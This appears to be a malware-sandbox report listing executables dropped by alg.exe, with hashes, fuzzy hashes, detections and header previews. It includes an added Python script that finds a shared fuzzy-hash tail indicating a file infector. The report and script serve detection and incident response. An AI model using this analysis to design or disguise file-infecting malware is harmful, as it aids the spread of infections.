                                                                                                                                                SHA-512:5EE99BF2B32F41B442ACA0D0B72080966D4921C9FCF292D1292CAB4CA2CBCBEE394BE134B13D767FE546037C10D3963272BE9D38B6C02EE3F924CEE32799A3D8
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................u...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1318400
                                                                                                                                                Entropy (8bit):7.448767740774152
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:jeR0gB6axoCf0R6RLQRF/TzJqe58BimNsqjnhMgeiCl7G0nehbGZpbD:9gHxmR6uBTzge5MimxDmg27RnWGj
                                                                                                                                                MD5:3C0C14BBD711571F3BC7DB429209660A
                                                                                                                                                SHA1:74C3AF40A85FD0BBA1182837D992CFFED574E3E3
                                                                                                                                                SHA-256:7E6FCA674E89EEC99E95772FD7C97E1A20D8034CE9F09DE79D3D24000BB7B066
                                                                                                                                                SHA-512:2CDA7A9777170226C4CAEB4556626FF17E8066965354B8356CC61EFDE898FAD9190E55917492B7D0D9083767E04685425E935D644EEBF1810F9E100134BD9AB9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`.......f......................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.44607838928542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:JnEbH0j4x7R6SvyCMzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:JkwOtO7zsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:4AD025F22D34898623700DE8727B3941
                                                                                                                                                SHA1:FBB5542C714F0E084D1C3A879ED467C535B07665
                                                                                                                                                SHA-256:8EBFBBB2AB75EFF25AA2FFAD1BC5AFC2BC50273D5EAF8FF9A6040155CE8A3CB3
                                                                                                                                                SHA-512:B0F6876F7AE2497FC451F78FD8699B04B4E2A2632F49F7794160200DB77CCB53A35288FF31EB0B94B59554E44AF752BDC78CD3EEC569B9DA445BA8E93A397C60
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                 • Antivirus: Avira, Detection: 100%
                                                                                                                                                 • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......?........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.446828223740191
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:bnU/h/4KIsqjnhMgeiCl7G0nehbGZpbD:bU/V0Dmg27RnWGj
                                                                                                                                                MD5:72A978F591C29F451B4AD70E56980EA4
                                                                                                                                                SHA1:143E8677C243067B0C348A3EA749A301DEC92F4E
                                                                                                                                                SHA-256:DE03CAA9C66A6840FF0CE00810F91A859BDBF1CBC4F5E811608A720470FE9FC3
                                                                                                                                                SHA-512:7B94291B4E9F4EDCA6658A7A974BC25DD6D4599980E11B288C641AFC388207A3740534F5D2A83D6181F48143955FFBB5419DB04D00619E7A92AF243037CD6C4B
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                 • Antivirus: Avira, Detection: 100%
                                                                                                                                                 • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@....../&.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1513984
                                                                                                                                                Entropy (8bit):5.483747168116759
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:0x71iBLZ05jNTmJWExXsqjnhMgeiCl7G0nehbGZpbD:0xhiHIjNgrDmg27RnWGj
                                                                                                                                                MD5:664327AED4B7D1E6C7D60C00F84E177D
                                                                                                                                                SHA1:F96C7F25954B084B49D48ACF3BA9157241A86760
                                                                                                                                                SHA-256:EA1D2B18B222E6518DA0D7422DA45950F4C691BDE39828119809E913631D27CA
                                                                                                                                                SHA-512:3CF4C9E28D17487FA3D528FD913FA5A995E61F1E7C25E5266E5724FA5BDC8294C480027DE299DCE0300705F64B886EE2B32EB54CE55207DBD183973F96B2B279
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                 • Antivirus: Avira, Detection: 100%
                                                                                                                                                 • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.................................K...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1419264
                                                                                                                                                Entropy (8bit):5.46672429691328
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:QlnRklQ6fgJcEwixVsqjnhMgeiCl7G0nehbGZpbD:0oRfgJcEwCJDmg27RnWGj
                                                                                                                                                MD5:C2EC50802AC3131E630A4E250BFED447
                                                                                                                                                SHA1:095CA833431BC7472EF8FFEA6526D8F87B4D6F4F
                                                                                                                                                SHA-256:46012FD8BC885A7E9D503E3B7C29611CFC0FFDC9B74B6EC9CEB15A8F11D6499F
                                                                                                                                                SHA-512:CFF99475C2C09B499B7B75AB26C4A235865BAD233B72538047DEA731455D318C4D85FC9C3691935FEE514F15BB9D48CB3909EB1207B65C275A6D323CDD6CD528
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................b......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................
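One thing the dropped-file list above shows, but does not say, is that the SSDEEP values of almost every file end in the same chunk (`...sqjnhMgeiCl7G0nehbGZpbD` at block size 24576, `...Dmg27RnWGj` at 49152) even though their heads differ and they are written by two different processes (x.exe and alg.exe). Files with different beginnings and an identical fuzzy-hash tail are what a payload appended to each host executable looks like, which matches the "Infects executable files" signature in this report. The script below is an added triage example, not part of the Joe Sandbox report or its tooling; its input is a constructed excerpt of the entries above (Process, Entropy, SSDEEP and MD5 fields only). It groups chunks by effective block size (the second ssdeep chunk is computed at twice the stated block size, so a 12288 file's second chunk is comparable to a 24576 file's first), finds the suffix all of them share, and skips chunks that hit ssdeep's output limits (64 characters for the first chunk, 32 for the second), because a chunk cut at the limit no longer describes the end of the file; the two 12288 entries and one 24576 entry in this list are exactly that case. The 7.0 entropy threshold is a common packed/encrypted heuristic, not a value from the report.

```python
import os
import re
from collections import defaultdict

# Constructed sample: a handful of entries copied from the dropped-file list
# in this report (Process, Entropy, SSDEEP and MD5 fields only).
REPORT_EXCERPT = r"""
Process:C:\Users\user\AppData\Local\Temp\x.exe
Entropy (8bit):5.277762657821456
SSDEEP:12288:QImGUcsvZZdubv7hfl3fXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:QxGBcmlvsqjnhMgeiCl7G0nehbGZpbD
MD5:C8BF45BDD9AC7A2C04E7836B9AC9D15E
Process:C:\Windows\System32\alg.exe
Entropy (8bit):5.6948062798472945
SSDEEP:24576:t0vHyeLj8trn3wsDsqjnhMgeiCl7G0nehbGZpbD:wtj4rgsHDmg27RnWGj
MD5:CAC57CEE72A26F39FBF9019DFD994258
Process:C:\Windows\System32\alg.exe
Entropy (8bit):7.279671701052209
SSDEEP:24576:1oMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZqsqjnhMgeiCl7G0nehbGZpv:s4i0wGJra0uAUfkVy7/Z+Dmg27RnWGj
MD5:E0BA361D8DB272A47BCF8AC05D8D8DDE
Process:C:\Windows\System32\alg.exe
Entropy (8bit):7.448767740774152
SSDEEP:24576:jeR0gB6axoCf0R6RLQRF/TzJqe58BimNsqjnhMgeiCl7G0nehbGZpbD:9gHxmR6uBTzge5MimxDmg27RnWGj
MD5:3C0C14BBD711571F3BC7DB429209660A
Process:C:\Windows\System32\alg.exe
Entropy (8bit):5.44607838928542
SSDEEP:12288:JnEbH0j4x7R6SvyCMzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:JkwOtO7zsqjnhMgeiCl7G0nehbGZpbD
MD5:4AD025F22D34898623700DE8727B3941
Process:C:\Windows\System32\alg.exe
Entropy (8bit):5.446828223740191
SSDEEP:24576:bnU/h/4KIsqjnhMgeiCl7G0nehbGZpbD:bU/V0Dmg27RnWGj
MD5:72A978F591C29F451B4AD70E56980EA4
Process:C:\Windows\System32\alg.exe
Entropy (8bit):5.496541844786697
SSDEEP:24576:TW25k8hb0Haw+xlsqjnhMgeiCl7G0nehbGZpbD:TWyk8SHawmZDmg27RnWGj
MD5:325EF02462CA82C2FB20F6E9423E343C
"""

SSDEEP_RE = re.compile(r"^(\d+):([^:]*):([^:]*)$")
# ssdeep emits at most 64 characters for the first chunk and 32 for the
# second. A chunk at that limit was cut short, so its last characters do
# not describe the end of the file and must not feed a shared-tail check.
CHUNK_LIMITS = (64, 32)
PACKED_ENTROPY = 7.0  # assumed triage heuristic for packed/encrypted PE data


def parse_report(text):
    """Split the report excerpt into one dict per 'Process:' entry."""
    entries, cur = [], None
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep:
            continue
        if key == "Process":
            cur = {"Process": value}
            entries.append(cur)
        elif cur is not None:
            cur[key] = value
    return entries


def ssdeep_chunks(signature):
    """Map effective block size -> (chunk, truncated?) for one ssdeep value.
    The second chunk is computed at twice the stated block size."""
    m = SSDEEP_RE.match(signature)
    if m is None:
        raise ValueError(f"not an ssdeep signature: {signature!r}")
    bs = int(m.group(1))
    chunks = (m.group(2), m.group(3))
    return {bs * (i + 1): (c, len(c) >= lim)
            for i, (c, lim) in enumerate(zip(chunks, CHUNK_LIMITS))}


def common_suffix(strings):
    return os.path.commonprefix([s[::-1] for s in strings])[::-1]


def shared_tails(entries, min_len=8):
    """Per block size: the suffix shared by every non-truncated chunk, plus
    the MD5s that contributed. A long shared tail across files whose heads
    differ is the fuzzy-hash signature of a payload appended to each file."""
    by_bs = defaultdict(list)
    for e in entries:
        for bs, (chunk, truncated) in ssdeep_chunks(e["SSDEEP"]).items():
            if not truncated:
                by_bs[bs].append((e["MD5"], chunk))
    tails = {}
    for bs, items in sorted(by_bs.items()):
        if len(items) < 2:
            continue
        tail = common_suffix([chunk for _, chunk in items])
        if len(tail) >= min_len:
            tails[bs] = (tail, [md5 for md5, _ in items])
    return tails


def high_entropy(entries, threshold=PACKED_ENTROPY):
    """MD5s of dropped files whose 8-bit entropy suggests packed/encrypted data."""
    return [e["MD5"] for e in entries if float(e["Entropy (8bit)"]) > threshold]


def triage(text):
    entries = parse_report(text)
    return {"files": len(entries),
            "shared_tails": shared_tails(entries),
            "high_entropy": high_entropy(entries)}


if __name__ == "__main__":
    summary = triage(REPORT_EXCERPT)
    print(f"{summary['files']} dropped files")
    for bs, (tail, md5s) in summary["shared_tails"].items():
        print(f"block size {bs}: {len(md5s)} files share ssdeep tail ...{tail}")
    print(f"entropy above {PACKED_ENTROPY}: {summary['high_entropy']}")
```

On this excerpt the 12288 block size yields nothing because both first chunks are exactly 64 characters (they agree up to the last character, which is the truncation point), while the 24576 and 49152 block sizes each return the shared tail quoted above; the file with MD5 E0BA361D8DB272A47BCF8AC05D8D8DDE is excluded from the 24576 group for the same truncation reason, not because it differs. Pivoting on the shared tail is a quicker way to find further hosts of the infector on disk than comparing the full fuzzy hashes pairwise.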
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1522176
                                                                                                                                                Entropy (8bit):5.496541844786697
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:TW25k8hb0Haw+xlsqjnhMgeiCl7G0nehbGZpbD:TWyk8SHawmZDmg27RnWGj
                                                                                                                                                MD5:325EF02462CA82C2FB20F6E9423E343C
                                                                                                                                                SHA1:B21BF2CBE8935C387EB46CC561ED3DE4AEDC2E4C
                                                                                                                                                SHA-256:5023DABF517343442E850A9FE4960709B7530E088E024F1B118F37966EAFE495
                                                                                                                                                SHA-512:5B7B850F6CACBE34FDF6F5103C404BDF30810E907AB2F77014EDFA439355E28355BE56D9B14D17349CE144F2AC9776B2A9AE488CCA50B1DC599875C6963BA02A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................N..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1282048
                                                                                                                                                Entropy (8bit):5.163952327522426
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:BWP/aK2vB+WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:BKCKAB9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:B3FF30650864C1CE951670AE931251D4
                                                                                                                                                SHA1:0C1B1CAFDF386B7B9BD85EF00BF3F949CD8AD710
                                                                                                                                                SHA-256:ACF4A752B0736FB013928F9B0390BCC478061119C87318EB4200A0BAEC7B89D5
                                                                                                                                                SHA-512:B240A689CD4C002FE075FCF979D758ED6666D28D2B74EEA9EEAFEB718AD6D9C2E5EC307015E459BAC2D88C912D72FC275EEC223492820C46565615CB41AFF135
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1228288
                                                                                                                                                Entropy (8bit):5.16203046659004
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:lO7cCNWB+094Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:kjNWBPGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:05E76F365B8052403C9F677AC404BB2B
                                                                                                                                                SHA1:136175D675A59BCE62927AA955EF0BF7108FBC59
                                                                                                                                                SHA-256:D854643153871BCE9831A8924799A9A40068FB3B4923A1465B789CA247EA85BF
                                                                                                                                                SHA-512:901DD96819AE400A595577DEC4C6B4C02815DA0C6C0F71CC9199CF66821522B3BC38C7599762445C8EB9C3EFA07ED66298A202CB8BEC1122A04E9AAD80C9B919
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@..........................................................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1302528
                                                                                                                                                Entropy (8bit):5.2389229788424165
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:+ihRyhdsRrEsqjnhMgeiCl7G0nehbGZpbD:+ihsoRgDmg27RnWGj
                                                                                                                                                MD5:8C97EE65409B53591F113BF785503CBF
                                                                                                                                                SHA1:60C0113223B45B110E4976762F16DA50B4DA6F08
                                                                                                                                                SHA-256:141590DEAE627459A66D478C1F07FCB2AB3649A6577ED5DFD994E9880D0A42BF
                                                                                                                                                SHA-512:D170A828E3C40B39206DB1360B24DD476D1A27F506227A59466D2784FDD20382E1749F1E9B53028A1F58A9F4FAD2FFE84048D08C1B04092FA220786C93F765B9
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......|.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1342464
                                                                                                                                                Entropy (8bit):5.3510138995375
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:R1FDmRF+wpx/Qaf7sqjnhMgeiCl7G0nehbGZpbD:hmRF+wn/JfvDmg27RnWGj
                                                                                                                                                MD5:F900E0307CE1FE1BDF71E59119246AEA
                                                                                                                                                SHA1:64AB20EDFB85738A1FF1B8E1E0C98D86F3AFDBA7
                                                                                                                                                SHA-256:47CE1C2F613ABE251F727728941558E233F3A142623E6E90BAB2CFEE974F2AF0
                                                                                                                                                SHA-512:11932B0C349D0D260709E91C22D5B64DB5F41E44E63BC53BFD0C3162FF29333894799CC055B45860D31F0D9BE0A0DE212D9854679E8A1C9B098152D86732A49F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@..................................................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1228288
                                                                                                                                                Entropy (8bit):5.161995297299323
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:L2Ae621B+0YKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:qE21BPZsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:E05799650B3D363DAB052D1E1C67D842
                                                                                                                                                SHA1:0BDE2BE10384D0E7D9D9E11A883FC19F3021ADCE
                                                                                                                                                SHA-256:35435ED09C0ABF50C7D76F20949D517193C597FD90981BF081C8A835094CD7C1
                                                                                                                                                SHA-512:D975165B77BF46FD45D98433BCBC6E8127C135247D33F0658BB76F5E4C9769A94618140402B0F9FBB7F16C431D2672DA2F52203704D8CFFABFC4A8543FAC2472
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................QX.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105669632
                                                                                                                                                Entropy (8bit):7.999989849484188
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:3145728:jLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:nBWx/pt8U7E6aZRfIICU
                                                                                                                                                MD5:3C5B57BA1207B7E62067D13AA49C46B9
                                                                                                                                                SHA1:276B6CB7B6D7AFD294AF66F2376052112E58BD48
                                                                                                                                                SHA-256:ED9B0E6D06FB4F1BDEEDFA663994D770142575F711154874CAB9C41D2F3E1121
                                                                                                                                                SHA-512:4B6F7B8C02BA17354CEC09BBF1B209F737E6FAA0FE7FC750188D8FD4C8AB9E18D7983D09F834B3A5C2DF84938C9E579310C0B9A7DFC1E28CD56713021CEB9A33
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1158144
                                                                                                                                                Entropy (8bit):5.0680906763861255
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:y9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:y9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:66F5B16FDC026AA28620763D069C5B50
                                                                                                                                                SHA1:52DC61F516C4B44CD1BBE22D86B89DFC39C3C372
                                                                                                                                                SHA-256:03D9A9E63576192B124C1688D8A5215D50336781641582A2DF4D9F12483AC33E
                                                                                                                                                SHA-512:DC79A0AFB90631629562D1F565EF7023FB79848448B82CC0C494F4AB0B4539626646434FF8D6B6B0B720BA0494108335682193E138AF808DDA3E606419547044
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................>.......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1142272
                                                                                                                                                Entropy (8bit):5.0324130690867666
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:YK2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:l2sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:01F45D9CB360821BF19D9473E1EE9E7F
                                                                                                                                                SHA1:608E14CC2F6D01B16128DAC2C444556E4D266500
                                                                                                                                                SHA-256:1D7F6C46C9A5121B654BFD06017BF472FA9725A2D64D81F569E43B0E5D31BF61
                                                                                                                                                SHA-512:07073803076110DD774E3C4567C468E04C349DE3964A22479867652853603C638DA99CDCC90DABAED1DF21D513608EFF0125E4EBF1D18116D0FB670FCB31CB72
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................a........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1375232
                                                                                                                                                Entropy (8bit):5.446077565494783
                                                                                                                                                Encrypted:false
